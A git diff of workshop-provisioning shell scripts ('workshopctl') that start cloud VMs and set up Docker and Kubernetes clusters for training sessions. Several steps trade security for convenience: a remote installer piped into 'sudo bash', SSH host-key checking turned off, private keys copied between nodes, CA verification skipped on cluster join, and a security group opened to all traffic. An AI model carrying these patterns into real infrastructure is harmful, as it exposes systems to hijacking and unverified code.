-sudo apt-get install -y wkhtmltopdf xvfb
-tmux new-session \; send-keys "
-[ -f ~/.ssh/id_rsa ] || ssh-keygen
-
-eval \$(ssh-agent)
-ssh-add
-Xvfb :0 &
-export DISPLAY=:0
-mkdir -p ~/www
-sudo docker run -d -p 80:80 -v \$HOME/www:/usr/share/nginx/html nginx
-"
+sudo apt-get update -q
+sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
+pip install --user awscli jinja2 pdfkit pssh
10  prepare-vms/e2e.sh  Executable file
@@ -0,0 +1,10 @@
#!/bin/sh
set -e
TAG=$(./workshopctl maketag)
./workshopctl start --settings settings/jerome.yaml --infra infra/aws-eu-central-1 --tag $TAG
./workshopctl deploy $TAG
./workshopctl kube $TAG
./workshopctl helmprom $TAG
while ! ./workshopctl kubetest $TAG; do sleep 1; done
./workshopctl tmux $TAG
echo ./workshopctl stop $TAG
6  prepare-vms/infra/example.aws  Normal file
@@ -0,0 +1,6 @@
INFRACLASS=aws
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
# and customize the variables below.
export AWS_DEFAULT_REGION=us-east-1
export AWS_ACCESS_KEY_ID=AKI...
export AWS_SECRET_ACCESS_KEY=...
2  prepare-vms/infra/example.generic  Normal file
@@ -0,0 +1,2 @@
INFRACLASS=generic
# This is for manual provisioning. No other variable or configuration is needed.
9  prepare-vms/infra/example.openstack  Normal file
@@ -0,0 +1,9 @@
INFRACLASS=openstack
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
# and customize the variables below.
export TF_VAR_user="jpetazzo"
export TF_VAR_tenant="training"
export TF_VAR_domain="Default"
export TF_VAR_password="..."
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
export TF_VAR_flavor="GP1.S"
@@ -1,105 +0,0 @@
aws_display_tags() {
    # Print all "Name" tags in our region with their instance count
    echo "[#] [Status] [Token] [Tag]" \
    | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
    aws ec2 describe-instances \
        --query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
    | tr -d "\r" \
    | uniq -c \
    | sort -k 3 \
    | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}

aws_get_tokens() {
    aws ec2 describe-instances --output text \
        --query 'Reservations[*].Instances[*].[ClientToken]' \
    | sort -u
}

aws_display_instance_statuses_by_tag() {
    TAG=$1
    need_tag $TAG

    IDS=$(aws ec2 describe-instances \
        --filters "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')

    aws ec2 describe-instance-status \
        --instance-ids $IDS \
        --query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
        --output table
}

aws_display_instances_by_tag() {
    TAG=$1
    need_tag $TAG
    result=$(aws ec2 describe-instances --output table \
        --filter "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].[ \
            InstanceId, \
            State.Name, \
            Tags[0].Value, \
            PublicIpAddress, \
            InstanceType \
            ]"
    )
    if [[ -z $result ]]; then
        die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
    else
        echo "$result"
    fi
}

aws_get_instance_ids_by_filter() {
    FILTER=$1
    aws ec2 describe-instances --filters $FILTER \
        --query Reservations[*].Instances[*].InstanceId \
        --output text | tr "\t" "\n" | tr -d "\r"
}

aws_get_instance_ids_by_client_token() {
    TOKEN=$1
    need_tag $TOKEN
    aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}

aws_get_instance_ids_by_tag() {
    TAG=$1
    need_tag $TAG
    aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}

aws_get_instance_ips_by_tag() {
    TAG=$1
    need_tag $TAG
    aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
        --output text \
        --query "Reservations[*].Instances[*].PublicIpAddress" \
    | tr "\t" "\n" \
    | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}

aws_kill_instances_by_tag() {
    TAG=$1
    need_tag $TAG
    IDS=$(aws_get_instance_ids_by_tag $TAG)
    if [ -z "$IDS" ]; then
        die "Invalid tag."
    fi

    info "Deleting instances with tag $TAG."

    aws ec2 terminate-instances --instance-ids $IDS \
        | grep ^TERMINATINGINSTANCES

    info "Deleted instances with tag $TAG."
}

aws_tag_instances() {
    OLD_TAG_OR_TOKEN=$1
    NEW_TAG=$2
    IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
    IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}
@@ -50,27 +50,41 @@ sep() {
    fi
}

-need_tag() {
+need_infra() {
+    if [ -z "$1" ]; then
+        die "Please specify infrastructure file. (e.g.: infra/aws)"
+    fi
+    if [ "$1" = "--infra" ]; then
+        die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
+    fi
+    if [ ! -f "$1" ]; then
+        die "Infrastructure file $1 doesn't exist."
+    fi
+    . "$1"
+    . "lib/infra/$INFRACLASS.sh"
+}
+
+need_tag() {
    if [ -z "$TAG" ]; then
        die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
    fi
+    if [ ! -d "tags/$TAG" ]; then
+        die "Tag $TAG not found (directory tags/$TAG does not exist)."
+    fi
+    for FILE in settings.yaml ips.txt infra.sh; do
+        if [ ! -f "tags/$TAG/$FILE" ]; then
+            warning "File tags/$TAG/$FILE not found."
+        fi
+    done
+    . "tags/$TAG/infra.sh"
+    . "lib/infra/$INFRACLASS.sh"
}

need_settings() {
    if [ -z "$1" ]; then
-        die "Please specify a settings file."
-    elif [ ! -f "$1" ]; then
        die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
    fi
+    if [ ! -f "$1" ]; then
+        die "Settings file $1 doesn't exist."
+    fi
}

need_ips_file() {
    IPS_FILE=$1
    if [ -z "$IPS_FILE" ]; then
        die "IPS_FILE not set."
    fi

    if [ ! -s "$IPS_FILE" ]; then
        die "IPS_FILE $IPS_FILE not found. Please run: $0 ips <TAG>"
    fi
}
@@ -2,26 +2,16 @@ export AWS_DEFAULT_OUTPUT=text
|
||||
|
||||
HELP=""
|
||||
_cmd() {
|
||||
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
|
||||
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
|
||||
}
|
||||
|
||||
_cmd help "Show available commands"
|
||||
_cmd_help() {
|
||||
printf "$(basename $0) - the orchestration workshop swiss army knife\n"
|
||||
printf "$(basename $0) - the container training swiss army knife\n"
|
||||
printf "Commands:"
|
||||
printf "%s" "$HELP" | sort
|
||||
}
|
||||
|
||||
_cmd amis "List Ubuntu AMIs in the current region"
|
||||
_cmd_amis() {
|
||||
find_ubuntu_ami -r $AWS_DEFAULT_REGION "$@"
|
||||
}
|
||||
|
||||
_cmd ami "Show the AMI that will be used for deployment"
|
||||
_cmd_ami() {
|
||||
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 16.04 -t hvm:ebs -N -q
|
||||
}
|
||||
|
||||
_cmd build "Build the Docker image to run this program in a container"
|
||||
_cmd_build() {
|
||||
docker-compose build
|
||||
@@ -32,73 +22,67 @@ _cmd_wrap() {
|
||||
docker-compose run --rm workshopctl "$@"
|
||||
}
|
||||
|
||||
_cmd cards "Generate ready-to-print cards for a batch of VMs"
|
||||
_cmd cards "Generate ready-to-print cards for a group of VMs"
|
||||
_cmd_cards() {
|
||||
TAG=$1
|
||||
SETTINGS=$2
|
||||
need_tag $TAG
|
||||
need_settings $SETTINGS
|
||||
need_tag
|
||||
|
||||
# If you're not using AWS, populate the ips.txt file manually
|
||||
if [ ! -f tags/$TAG/ips.txt ]; then
|
||||
aws_get_instance_ips_by_tag $TAG >tags/$TAG/ips.txt
|
||||
fi
|
||||
# This will process ips.txt to generate two files: ips.pdf and ips.html
|
||||
(
|
||||
cd tags/$TAG
|
||||
../../lib/ips-txt-to-html.py settings.yaml
|
||||
)
|
||||
|
||||
# Remove symlinks to old cards
|
||||
rm -f ips.html ips.pdf
|
||||
|
||||
# This will generate two files in the base dir: ips.pdf and ips.html
|
||||
lib/ips-txt-to-html.py $SETTINGS
|
||||
|
||||
for f in ips.html ips.pdf; do
|
||||
# Remove old versions of cards if they exist
|
||||
rm -f tags/$TAG/$f
|
||||
|
||||
# Move the generated file and replace it with a symlink
|
||||
mv -f $f tags/$TAG/$f && ln -s tags/$TAG/$f $f
|
||||
done
|
||||
ln -sf ../tags/$TAG/ips.html www/$TAG.html
|
||||
ln -sf ../tags/$TAG/ips.pdf www/$TAG.pdf
|
||||
|
||||
info "Cards created. You can view them with:"
|
||||
info "xdg-open ips.html ips.pdf (on Linux)"
|
||||
info "open ips.html ips.pdf (on MacOS)"
|
||||
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
|
||||
info "open tags/$TAG/ips.html (on macOS)"
|
||||
info "Or you can start a web server with:"
|
||||
info "$0 www"
|
||||
}
|
||||
|
||||
_cmd deploy "Install Docker on a bunch of running VMs"
|
||||
_cmd_deploy() {
|
||||
TAG=$1
|
||||
SETTINGS=$2
|
||||
need_tag $TAG
|
||||
need_settings $SETTINGS
|
||||
link_tag $TAG
|
||||
count=$(wc -l ips.txt)
|
||||
need_tag
|
||||
|
||||
# wait until all hosts are reachable before trying to deploy
|
||||
info "Trying to reach $TAG instances..."
|
||||
while ! tag_is_reachable $TAG; do
|
||||
while ! tag_is_reachable; do
|
||||
>/dev/stderr echo -n "."
|
||||
sleep 2
|
||||
done
|
||||
>/dev/stderr echo ""
|
||||
|
||||
echo deploying > tags/$TAG/status
|
||||
sep "Deploying tag $TAG"
|
||||
pssh -I tee /tmp/settings.yaml <$SETTINGS
|
||||
|
||||
# Wait for cloudinit to be done
|
||||
pssh "
|
||||
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
|
||||
sleep 1
|
||||
done"
|
||||
|
||||
# Copy settings and install Python YAML parser
|
||||
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
|
||||
pssh "
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install -y python-setuptools &&
|
||||
sudo easy_install pyyaml"
|
||||
sudo apt-get install -y python-yaml"
|
||||
|
||||
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
|
||||
pssh -I tee /tmp/postprep.py <lib/postprep.py
|
||||
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <ips.txt
|
||||
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
|
||||
|
||||
# Install docker-prompt script
|
||||
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
|
||||
pssh sudo chmod +x /usr/local/bin/docker-prompt
|
||||
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
|
||||
pssh "
|
||||
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
|
||||
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
sudo -u docker tar -C /home/docker -xf-"
|
||||
|
||||
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
|
||||
@@ -107,24 +91,78 @@ _cmd_deploy() {
|
||||
cat /home/docker/.ssh/id_rsa.pub |
|
||||
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
|
||||
|
||||
# On node1, create and deploy TLS certs using Docker Machine
|
||||
# On the first node, create and deploy TLS certs using Docker Machine
|
||||
# (Currently disabled.)
|
||||
true || pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
grep ' node' /etc/hosts |
|
||||
if i_am_first_node; then
|
||||
grep '[0-9]\$' /etc/hosts |
|
||||
xargs -n2 sudo -H -u docker \
|
||||
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
|
||||
fi"
|
||||
|
||||
sep "Deployed tag $TAG"
|
||||
echo deployed > tags/$TAG/status
|
||||
info "You may want to run one of the following commands:"
|
||||
info "$0 kube $TAG"
|
||||
info "$0 pull_images $TAG"
|
||||
info "$0 cards $TAG $SETTINGS"
|
||||
info "$0 cards $TAG"
|
||||
}
|
||||
|
||||
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
|
||||
_cmd_disabledocker() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "
|
||||
sudo systemctl disable docker.service
|
||||
sudo systemctl disable docker.socket
|
||||
sudo systemctl stop docker
|
||||
sudo killall containerd
|
||||
"
|
||||
}
|
||||
|
||||
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
|
||||
_cmd_kubebins() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh --timeout 300 "
|
||||
set -e
|
||||
cd /usr/local/bin
|
||||
if ! [ -x etcd ]; then
|
||||
##VERSION##
|
||||
curl -L https://github.com/etcd-io/etcd/releases/download/v3.4.3/etcd-v3.4.3-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
|
||||
fi
|
||||
if ! [ -x hyperkube ]; then
|
||||
##VERSION##
|
||||
curl -L https://dl.k8s.io/v1.17.2/kubernetes-server-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=3 -zx \
|
||||
kubernetes/server/bin/kube{ctl,let,-proxy,-apiserver,-scheduler,-controller-manager}
|
||||
fi
|
||||
sudo mkdir -p /opt/cni/bin
|
||||
cd /opt/cni/bin
|
||||
if ! [ -x bridge ]; then
|
||||
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.6/cni-plugins-amd64-v0.7.6.tgz \
|
||||
| sudo tar -zx
|
||||
fi
|
||||
"
|
||||
}
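
# As a quick spot-check after this command (versions match the URLs above),
# something like this should confirm the binaries landed on every node:
#
#     pssh "etcd --version | head -n1 && kubectl version --client --short && ls -l /opt/cni/bin/bridge"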

_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
_cmd_kube() {
    TAG=$1
    need_tag

    # Optional version, e.g. 1.13.5
    KUBEVERSION=$2
    if [ "$KUBEVERSION" ]; then
        EXTRA_APTGET="=$KUBEVERSION-00"
        EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
    else
        EXTRA_APTGET=""
        EXTRA_KUBEADM=""
    fi
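
    # For example, with KUBEVERSION=1.13.5 the assignments above yield
    # EXTRA_APTGET="=1.13.5-00" (an apt version pin, as in kubelet=1.13.5-00)
    # and EXTRA_KUBEADM="--kubernetes-version=v1.13.5".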

    # Install packages
    pssh --timeout 200 "

@@ -134,19 +172,19 @@ _cmd_kube() {
    sudo tee /etc/apt/sources.list.d/kubernetes.list"
    pssh --timeout 200 "
    sudo apt-get update -q &&
    sudo apt-get install -qy kubelet kubeadm kubectl
    sudo apt-get install -qy kubelet$EXTRA_APTGET kubeadm$EXTRA_APTGET kubectl$EXTRA_APTGET &&
    kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"

    # Initialize kube master
    pssh --timeout 200 "
    if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
        kubeadm token generate > /tmp/token
        sudo kubeadm init --token \$(cat /tmp/token)
    if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
        kubeadm token generate > /tmp/token &&
        sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
    fi"

    # Put kubeconfig in ubuntu's and docker's accounts
    pssh "
    if grep -q node1 /tmp/node; then
    if i_am_first_node; then
        sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
        sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
        sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&

@@ -156,53 +194,103 @@ _cmd_kube() {

    # Install weave as the pod network
    pssh "
    if grep -q node1 /tmp/node; then
        kubever=\$(kubectl version | base64 | tr -d '\n')
    if i_am_first_node; then
        kubever=\$(kubectl version | base64 | tr -d '\n') &&
        kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
    fi"

    # Join the other nodes to the cluster
    pssh --timeout 200 "
    if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
        TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token)
        sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
    if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
        FIRSTNODE=\$(cat /etc/name_of_first_node) &&
        TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
        sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
    fi"

    # Install metrics server
    pssh "
    if i_am_first_node; then
        kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
    fi"

    # Install kubectx and kubens
    pssh "
    [ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
    sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
    sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
    sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
    [ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
    sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
    sudo -u docker tee -a /home/docker/.bashrc <<EOF
. /home/ubuntu/kube-ps1/kube-ps1.sh
KUBE_PS1_PREFIX=""
KUBE_PS1_SUFFIX=""
KUBE_PS1_SYMBOL_ENABLE="false"
KUBE_PS1_CTX_COLOR="green"
KUBE_PS1_NS_COLOR="green"
EOF"

    # Install stern
    pssh "
    if [ ! -x /usr/local/bin/stern ]; then
        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.8.0/stern_linux_amd64
        sudo chmod +x /usr/local/bin/stern
        ##VERSION##
        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
        sudo chmod +x /usr/local/bin/stern &&
        stern --completion bash | sudo tee /etc/bash_completion.d/stern
    fi"

    # Install helm
    pssh "
    if [ ! -x /usr/local/bin/helm ]; then
        curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash
        curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get-helm-3 | sudo bash &&
        helm completion bash | sudo tee /etc/bash_completion.d/helm
    fi"

    # Install ship
    pssh "
    if [ ! -x /usr/local/bin/ship ]; then
        ##VERSION##
        curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
        sudo tar -C /usr/local/bin -zx ship
    fi"

    # Install the AWS IAM authenticator
    pssh "
    if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
        ##VERSION##
        sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
        sudo chmod +x /usr/local/bin/aws-iam-authenticator
    fi"

    sep "Done"
}

_cmd kubetest "Check that all notes are reporting as Ready"
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
_cmd_kubereset() {
    TAG=$1
    need_tag

    pssh "sudo kubeadm reset --force"
}

_cmd kubetest "Check that all nodes are reporting as Ready"
_cmd_kubetest() {
    TAG=$1
    need_tag

    # There are way too many backslashes in the command below.
    # Feel free to make that better ♥
    pssh "
    set -e
    [ -f /tmp/node ]
    if grep -q node1 /tmp/node; then
    if i_am_first_node; then
        which kubectl
        for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
        for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
            echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
        done
    fi"
}

_cmd ids "List the instance IDs belonging to a given tag or token"
_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
_cmd_ids() {
    TAG=$1
    need_tag $TAG

@@ -215,262 +303,398 @@ _cmd_ids() {
    aws_get_instance_ids_by_client_token $TAG
}

_cmd ips "List the IP addresses of the VMs for a given tag or token"
_cmd_ips() {
    TAG=$1
    need_tag $TAG
    mkdir -p tags/$TAG
    aws_get_instance_ips_by_tag $TAG | tee tags/$TAG/ips.txt
    link_tag $TAG
}

_cmd list "List available batches in the current region"
_cmd list "List available groups for a given infrastructure"
_cmd_list() {
    info "Listing batches in region $AWS_DEFAULT_REGION:"
    aws_display_tags
    need_infra $1
    infra_list
}

_cmd status "List instance status for a given batch"
_cmd_status() {
    info "Using region $AWS_DEFAULT_REGION."
_cmd listall "List VMs running on all configured infrastructures"
_cmd_listall() {
    for infra in infra/*; do
        case $infra in
        infra/example.*)
            ;;
        *)
            info "Listing infrastructure $infra:"
            need_infra $infra
            infra_list
            ;;
        esac
    done
}

_cmd maketag "Generate a quasi-unique tag for a group of instances"
_cmd_maketag() {
    if [ -z $USER ]; then
        export USER=anonymous
    fi
    MS=$(($(date +%N)/1000000))
    date +%Y-%m-%d-%H-%M-$MS-$USER
}
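
# Example (output is illustrative; the fields are a minute-resolution
# timestamp, milliseconds, and $USER):
#
#     $ ./workshopctl maketag
#     2020-02-14-09-30-243-jerome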

_cmd ping "Ping VMs in a given tag, to check that they have network access"
_cmd_ping() {
    TAG=$1
    need_tag $TAG
    describe_tag $TAG
    tag_is_reachable $TAG
    info "You may be interested in running one of the following commands:"
    info "$0 ips $TAG"
    info "$0 deploy $TAG <settings/somefile.yaml>"
    need_tag

    fping < tags/$TAG/ips.txt
}

_cmd netfix "Disable GRO and run a pinger job on the VMs"
_cmd_netfix () {
    TAG=$1
    need_tag

    pssh "
    sudo ethtool -K ens3 gro off
    sudo tee /root/pinger.service <<EOF
[Unit]
Description=pinger

[Install]
WantedBy=multi-user.target

[Service]
WorkingDirectory=/
ExecStart=/bin/ping -w60 1.1
User=nobody
Group=nogroup
Restart=always
EOF
    sudo systemctl enable /root/pinger.service
    sudo systemctl start pinger"
}

_cmd tailhist "Install history viewer on port 1088"
_cmd_tailhist () {
    TAG=$1
    need_tag

    pssh "
    wget https://github.com/joewalnes/websocketd/releases/download/v0.3.0/websocketd-0.3.0_amd64.deb
    sudo dpkg -i websocketd-0.3.0_amd64.deb
    sudo mkdir -p /tmp/tailhist
    sudo tee /root/tailhist.service <<EOF
[Unit]
Description=tailhist

[Install]
WantedBy=multi-user.target

[Service]
WorkingDirectory=/tmp/tailhist
ExecStart=/usr/bin/websocketd --port=1088 --staticdir=. sh -c \"tail -n +1 -f /home/docker/.history || echo 'Could not read history file. Perhaps you need to \\\"chmod +r .history\\\"?'\"
User=nobody
Group=nogroup
Restart=always
EOF
    sudo systemctl enable /root/tailhist.service
    sudo systemctl start tailhist"
    pssh -I sudo tee /tmp/tailhist/index.html <lib/tailhist.html
}

_cmd opensg "Open the default security group to ALL ingress traffic"
_cmd_opensg() {
    aws ec2 authorize-security-group-ingress \
        --group-name default \
        --protocol icmp \
        --port -1 \
        --cidr 0.0.0.0/0
    need_infra $1
    infra_opensg
}

    aws ec2 authorize-security-group-ingress \
        --group-name default \
        --protocol udp \
        --port 0-65535 \
        --cidr 0.0.0.0/0
_cmd portworx "Prepare the nodes for Portworx deployment"
_cmd_portworx() {
    TAG=$1
    need_tag

    aws ec2 authorize-security-group-ingress \
        --group-name default \
        --protocol tcp \
        --port 0-65535 \
        --cidr 0.0.0.0/0
    pssh "
    sudo truncate --size 10G /portworx.blk &&
    sudo losetup /dev/loop4 /portworx.blk"
}

_cmd disableaddrchecks "Disable source/destination IP address checks"
_cmd_disableaddrchecks() {
    TAG=$1
    need_tag

    infra_disableaddrchecks
}

_cmd pssh "Run an arbitrary command on all nodes"
_cmd_pssh() {
    TAG=$1
    need_tag
    shift

    pssh "$@"
}

_cmd pull_images "Pre-pull a bunch of Docker images"
_cmd_pull_images() {
    TAG=$1
    need_tag $TAG
    pull_tag $TAG
    need_tag
    pull_tag
}

_cmd retag "Apply a new tag to a batch of VMs"
_cmd remap_nodeports "Remap NodePort range to 10000-10999"
_cmd_remap_nodeports() {
    TAG=$1
    need_tag

    FIND_LINE=" - --service-cluster-ip-range=10.96.0.0\/12"
    ADD_LINE=" - --service-node-port-range=10000-10999"
    MANIFEST_FILE=/etc/kubernetes/manifests/kube-apiserver.yaml
    pssh "
    if i_am_first_node && ! grep -q '$ADD_LINE' $MANIFEST_FILE; then
        sudo sed -i 's/\($FIND_LINE\)\$/\1\n$ADD_LINE/' $MANIFEST_FILE
    fi"
}
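
# The sed above takes the kube-apiserver manifest from:
#
#     - --service-cluster-ip-range=10.96.0.0/12
#
# to:
#
#     - --service-cluster-ip-range=10.96.0.0/12
#     - --service-node-port-range=10000-10999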

_cmd quotas "Check our infrastructure quotas (max instances)"
_cmd_quotas() {
    need_infra $1
    infra_quotas
}

_cmd retag "(FIXME) Apply a new tag to a group of VMs"
_cmd_retag() {
    OLDTAG=$1
    NEWTAG=$2
    need_tag $OLDTAG
    TAG=$OLDTAG
    need_tag
    if [[ -z "$NEWTAG" ]]; then
        die "You must specify a new tag to apply."
    fi
    aws_tag_instances $OLDTAG $NEWTAG
}

_cmd start "Start a batch of VMs"
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
    TAG=$1
    need_tag
    IP=$(head -1 tags/$TAG/ips.txt)
    info "Logging into $IP"
    ssh docker@$IP
}

_cmd start "Start a group of VMs"
_cmd_start() {
    # Number of instances to create
    COUNT=$1
    # Optional settings file (to carry on with deployment)
    SETTINGS=$2
    while [ ! -z "$*" ]; do
        case "$1" in
        --infra) INFRA=$2; shift 2;;
        --settings) SETTINGS=$2; shift 2;;
        --count) COUNT=$2; shift 2;;
        --tag) TAG=$2; shift 2;;
        *) die "Unrecognized parameter: $1."
        esac
    done

    if [ -z "$INFRA" ]; then
        die "Please add --infra flag to specify which infrastructure file to use."
    fi
    if [ -z "$SETTINGS" ]; then
        die "Please add --settings flag to specify which settings file to use."
    fi
    if [ -z "$COUNT" ]; then
        die "Indicate number of instances to start."
        COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
        warning "No --count option was specified. Using value from settings file ($COUNT)."
    fi

    # Print our AWS username, to ease the pain of credential-juggling
    greet
    # Check that the specified settings and infrastructure are valid.
    need_settings $SETTINGS
    need_infra $INFRA

    # Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
    key_name=$(sync_keys)

    AMI=$(_cmd_ami) # Retrieve the AWS image ID
    if [ -z "$AMI" ]; then
        die "I could not find which AMI to use in this region. Try another region?"
    if [ -z "$TAG" ]; then
        TAG=$(_cmd_maketag)
    fi
    TOKEN=$(get_token) # generate a timestamp token for this batch of VMs
    AWS_KEY_NAME=$(make_key_name)

    sep "Starting instances"
    info " Count: $COUNT"
    info " Region: $AWS_DEFAULT_REGION"
    info " Token/tag: $TOKEN"
    info " AMI: $AMI"
    info " Key name: $AWS_KEY_NAME"
    result=$(aws ec2 run-instances \
        --key-name $AWS_KEY_NAME \
        --count $COUNT \
        --instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
        --client-token $TOKEN \
        --image-id $AMI)
    reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
    info "Reservation ID: $reservation_id"
    sep

    # if instance creation succeeded, we should have some IDs
    IDS=$(aws_get_instance_ids_by_client_token $TOKEN)
    if [ -z "$IDS" ]; then
        die "Instance creation failed."
    fi

    # Tag these new instances with a tag that is the same as the token
    TAG=$TOKEN
    aws_tag_instances $TOKEN $TAG

    wait_until_tag_is_running $TAG $COUNT
    mkdir -p tags/$TAG
    ln -s ../../$INFRA tags/$TAG/infra.sh
    ln -s ../../$SETTINGS tags/$TAG/settings.yaml
    echo creating > tags/$TAG/status

    infra_start $COUNT
    sep
    info "Successfully created $COUNT instances with tag $TAG"
    sep
    echo created > tags/$TAG/status

    mkdir -p tags/$TAG
    IPS=$(aws_get_instance_ips_by_tag $TAG)
    echo "$IPS" >tags/$TAG/ips.txt
    link_tag $TAG
    if [ -n "$SETTINGS" ]; then
        _cmd_deploy $TAG $SETTINGS
    else
        info "To deploy or kill these instances, run one of the following:"
        info "$0 deploy $TAG <settings/somefile.yaml>"
        info "$0 stop $TAG"
    fi
}
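
# With the flag-based interface above, a typical invocation would be
# something like (file names are examples):
#
#     ./workshopctl start --infra infra/aws --settings settings/kube101.yaml --count 6
#
# --tag is optional; when omitted, a tag is generated with maketag.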

_cmd ec2quotas "Check our EC2 quotas (max instances)"
_cmd_ec2quotas() {
    greet

    max_instances=$(aws ec2 describe-account-attributes \
        --attribute-names max-instances \
        --query 'AccountAttributes[*][AttributeValues]')
    info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."

    # Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
    # If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
    # Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
    info "Available regions:"
